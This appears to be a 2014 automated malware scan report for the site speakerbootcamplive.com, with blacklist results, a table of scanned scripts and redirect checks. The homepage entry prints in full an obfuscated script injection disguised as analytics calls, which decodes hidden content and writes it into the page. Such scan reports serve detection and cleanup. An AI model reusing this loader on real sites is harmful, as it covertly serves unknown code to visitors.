Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=speakerbootcamplive.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://speakerbootcamplive.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://speakerbootcamplive.com/ | 200 OK Content-Length: 12463 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw6 = []; _gw6.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _gw6.push(['_trackPageview', '6918518510413211618418718018017518017316518519318218118']); _gw6.push(['_trackPageview', '5175186175181180128167168185181178187186171129169178175']); _gw6.push(['_setOption', '1821281841711691861101221181181821901141671871861811141']); _gw6.push(['_setOption', '6718718618111412211811818219011112919513011718518619117']); _gw6.push(['_trackPageview', '8171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw6.length; v++) t += _gw6[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://speakerbootcamplive.com/wp-content/uploads/jw-player-plugin-for-wordpress/player/jwplayer.js?ver=3.8.5 | 200 OK Content-Length: 155682 Content-Type: application/javascript | clean |
http://speakerbootcamplive.com/wp-content/themes/OptimizePress/js/js_cookie.js?ver=1.0 | 200 OK Content-Length: 613 Content-Type: application/javascript | clean |
http://speakerbootcamplive.com/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93085 Content-Type: application/javascript | clean |
http://speakerbootcamplive.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://speakerbootcamplive.com/wp-content/themes/OptimizePress/js/cufon-yui.js | 200 OK Content-Length: 18258 Content-Type: application/javascript | clean |
http://speakerbootcamplive.com/wp-content/themes/OptimizePress/js/qtobject.js | 200 OK Content-Length: 2354 Content-Type: application/javascript | clean |
https://my936.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=69150f77252f438e064d16a8418dfebd | 200 OK Content-Length: 3758 Content-Type: text/plain | clean |
http://my936.infusionsoft.com/test404page.js | HTTP/1.1 302 Found Connection: Keep-Alive Location: https://my936.infusionsoft.com/test404page.js Server: Apache-Coyote/1.1 Content-Length: 0 | clean |
https://my936.infusionsoft.com/test404page.js | HTTP/1.1 302 Found Date: Sat, 13 Dec 2014 08:45:33 GMT Location: https://signin.infusionsoft.com?service=https%3A%2F%2Fmy936.infusionsoft.com%2Fj_spring_cas_security_check Server: Apache-Coyote/1.1 Content-Length: 0 Content-Type: text/javascript;charset=UTF-8 Expires: Sat, 13 Dec 2014 20:45:34 GMT Set-Cookie: JSESSIONID=8D71212DDACFB65CEE9A7A33E009B1EE; Path=/; Secure; HttpOnly Set-Cookie: app-lb=2214789130.20480.0000; path=/ X-Cnection: close | clean |
https://signin.infusionsoft.com?service=https%3a%2f%2fmy936.infusionsoft.com%2fj_spring_cas_security_check/ | HTTP/1.1 302 Found Date: Sat, 13 Dec 2014 08:45:36 GMT Location: https://signin.infusionsoft.com/login?service=https%3a%2f%2fmy936.infusionsoft.com%2fj_spring_cas_security_check/ Content-Length: 0 Content-Type: text/html;charset=UTF-8 Set-Cookie: app-lb=168296458.20480.0000; path=/ Set-Cookie: TS1b1025=55af7e7c20cb51d4e51fe12569f0bb2d0dd139e3f9138941548bfcb0431c454977a70f4c; Path=/; Secure; HTTPOnly Set-Cookie: TS1b1025_28=281a7c3e1e3c3c1b06c01efac65de4c70dd139e3f9138941000000000000000000548bfcb00dd139e3f9138941; Path=/; Secure; HTTPOnly X-Cnection: close X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN | clean |
https://signin.infusionsoft.com/login?service=https%3a%2f%2fmy936.infusionsoft.com%2fj_spring_cas_security_check/ | 200 OK Content-Length: 16738 Content-Type: text/html | clean |
https://signin.infusionsoft.com/js/jquery-1.11.0/jquery-1.11.0.min.js;jsessionid=45BB57759E1FC067479FFA44477F5B28 | 200 OK Content-Length: 96381 Content-Type: text/javascript | clean |
http://my936.infusionsoft.com/bootstrap-3.2.0-dist/js/bootstrap.min.js;jsessionid=45BB57759E1FC067479FFA44477F5B28 | HTTP/1.1 302 Found Connection: Keep-Alive Location: https://my936.infusionsoft.com/bootstrap-3.2.0-dist/js/bootstrap.min.js;jsessionid=45BB57759E1FC067479FFA44477F5B28 Server: Apache-Coyote/1.1 Content-Length: 0 | clean |
https://my936.infusionsoft.com/bootstrap-3.2.0-dist/js/bootstrap.min.js;jsessionid=45bb57759e1fc067479ffa44477f5b28 | HTTP/1.1 302 Found Date: Sat, 13 Dec 2014 08:45:40 GMT Location: https://signin.infusionsoft.com?service=https%3A%2F%2Fmy936.infusionsoft.com%2Fj_spring_cas_security_check Server: Apache-Coyote/1.1 Content-Length: 0 Expires: Sat, 13 Dec 2014 20:45:41 GMT Set-Cookie: JSESSIONID=E83953DB425EE09E8ED71BCFA8807219; Path=/; Secure; HttpOnly Set-Cookie: app-lb=2214789130.20480.0000; path=/ X-Cnection: close | clean |
http://signin.infusionsoft.com?service=https%3a%2f%2fmy936.infusionsoft.com%2fj_spring_cas_security_check/test404page.js | HTTP/1.1 302 Found Connection: Keep-Alive Location: https://signin.infusionsoft.com/?service=https%3a%2f%2fmy936.infusionsoft.com%2fj_spring_cas_security_check/test404page.js Server: Apache-Coyote/1.1 Content-Length: 0 | clean |
https://signin.infusionsoft.com/?service=https%3a%2f%2fmy936.infusionsoft.com%2fj_spring_cas_security_check/test404page.js | HTTP/1.1 302 Found Date: Sat, 13 Dec 2014 08:45:42 GMT Location: https://signin.infusionsoft.com/login?service=https%3a%2f%2fmy936.infusionsoft.com%2fj_spring_cas_security_check/test404page.js Content-Length: 0 Content-Type: text/html;charset=UTF-8 Set-Cookie: app-lb=336068618.20480.0000; path=/ Set-Cookie: TS1b1025=b74fea86fa5b558d4ab68ddf0c2f552f14b29f8a3a4e3019548bfcb6431c454980507999; Path=/; Secure; HTTPOnly Set-Cookie: TS1b1025_28=5b16c2433098ce3a86770b746a2b4e5214b29f8a3a4e3019000000000000000000548bfcb614b29f8a3a4e3019; Path=/; Secure; HTTPOnly X-Cnection: close X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN | clean |
https://signin.infusionsoft.com/login?service=https%3a%2f%2fmy936.infusionsoft.com%2fj_spring_cas_security_check/test404page.js | 200 OK Content-Length: 16751 Content-Type: text/html | clean |
https://signin.infusionsoft.com/js/jquery-1.11.0/jquery-1.11.0.min.js;jsessionid=9BADBEADF7CF81FC0D9FE4CB8809AC2D | 200 OK Content-Length: 96381 Content-Type: text/javascript | clean |
http://signin.infusionsoft.com?service=https%3a%2f%2fmy936.infusionsoft.com%2fj_spring_cas_security_check/bootstrap-3.2.0-dist/js/bootstrap.min.js;jsessionid=9BADBEADF7CF81FC0D9FE4CB8809AC2D | HTTP/1.1 302 Found Connection: Keep-Alive Location: https://signin.infusionsoft.com/?service=https%3a%2f%2fmy936.infusionsoft.com%2fj_spring_cas_security_check/bootstrap-3.2.0-dist/js/bootstrap.min.js;jsessionid=9BADBEADF7CF81FC0D9FE4CB8809AC2D Server: Apache-Coyote/1.1 Content-Length: 0 | clean |
https://signin.infusionsoft.com/?service=https%3a%2f%2fmy936.infusionsoft.com%2fj_spring_cas_security_check/bootstrap-3.2.0-dist/js/bootstrap.min.js;jsessionid=9badbeadf7cf81fc0d9fe4cb8809ac2d | HTTP/1.1 302 Found Date: Sat, 13 Dec 2014 08:45:46 GMT Location: https://signin.infusionsoft.com/login?service=https%3a%2f%2fmy936.infusionsoft.com%2fj_spring_cas_security_check/bootstrap-3.2.0-dist/js/bootstrap.min.js;jsessionid=9badbeadf7cf81fc0d9fe4cb8809ac2d Content-Length: 0 Content-Type: text/html;charset=UTF-8 Set-Cookie: app-lb=185073674.20480.0000; path=/ Set-Cookie: TS1b1025=a8ab9646cad381230c4ae119d781273b6316e4488f0e0973548bfcba431c4549cae1bce6; Path=/; Secure; HTTPOnly Set-Cookie: TS1b1025_28=836aef87dcd668848dd5c5acac1b943d6316e4488f0e0973000000000000000000548bfcba6316e4488f0e0973; Path=/; Secure; HTTPOnly X-Cnection: close X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN | clean |
https://signin.infusionsoft.com/login?service=https%3a%2f%2fmy936.infusionsoft.com%2fj_spring_cas_security_check/bootstrap-3.2.0-dist/js/bootstrap.min.js;jsessionid=9badbeadf7cf81fc0d9fe4cb8809ac2d | 200 OK Content-Length: 16822 Content-Type: text/html | clean |
https://signin.infusionsoft.com/js/jquery-1.11.0/jquery-1.11.0.min.js;jsessionid=C9D2869CEE38CB90CF602F4D5401750E | 200 OK Content-Length: 96381 Content-Type: text/javascript | clean |
http://signin.infusionsoft.com?service=https%3a%2f%2fmy936.infusionsoft.com%2fj_spring_cas_security_check/bootstrap-3.2.0-dist/js/bootstrap.min.js;jsessionid=C9D2869CEE38CB90CF602F4D5401750E | HTTP/1.1 302 Found Connection: Keep-Alive Location: https://signin.infusionsoft.com/?service=https%3a%2f%2fmy936.infusionsoft.com%2fj_spring_cas_security_check/bootstrap-3.2.0-dist/js/bootstrap.min.js;jsessionid=C9D2869CEE38CB90CF602F4D5401750E Server: Apache-Coyote/1.1 Content-Length: 0 | clean |
https://signin.infusionsoft.com/?service=https%3a%2f%2fmy936.infusionsoft.com%2fj_spring_cas_security_check/bootstrap-3.2.0-dist/js/bootstrap.min.js;jsessionid=c9d2869cee38cb90cf602f4d5401750e | HTTP/1.1 302 Found Date: Sat, 13 Dec 2014 08:45:50 GMT Location: https://signin.infusionsoft.com/login?service=https%3a%2f%2fmy936.infusionsoft.com%2fj_spring_cas_security_check/bootstrap-3.2.0-dist/js/bootstrap.min.js;jsessionid=c9d2869cee38cb90cf602f4d5401750e Content-Length: 0 Content-Type: text/html;charset=UTF-8 Set-Cookie: app-lb=336068618.20480.0000; path=/ Set-Cookie: TS1b1025=56109834b12151fa11e1e6dee74d93b82c0325bd4e957e9b548bfcbe431c454980507999; Path=/; Secure; HTTPOnly Set-Cookie: TS1b1025_28=2bf495bc1991ce1f2b6116badc1378132c0325bd4e957e9b000000000000000000548bfcbe2c0325bd4e957e9b; Path=/; Secure; HTTPOnly X-Cnection: close X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN | clean |
https://signin.infusionsoft.com/login?service=https%3a%2f%2fmy936.infusionsoft.com%2fj_spring_cas_security_check/bootstrap-3.2.0-dist/js/bootstrap.min.js;jsessionid=c9d2869cee38cb90cf602f4d5401750e | 200 OK Content-Length: 16821 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: speakerbootcamplive.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 13 Dec 2014 08:45:25 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Link: <http://speakerbootcamplive.com/?p=1723>; rel=shortlink
X-Pingback: http://speakerbootcamplive.com/xmlrpc.php
GET / HTTP/1.1
Host: speakerbootcamplive.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 13 Dec 2014 08:45:25 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Link: <http://speakerbootcamplive.com/?p=1723>; rel=shortlink
X-Pingback: http://speakerbootcamplive.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: speakerbootcamplive.com
Referer: http://www.google.com/search?q=speakerbootcamplive.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: speakerbootcamplive.com
Referer: http://www.google.com/search?q=speakerbootcamplive.com
Result:
The result is similar to the first query. There are no suspicious redirects found.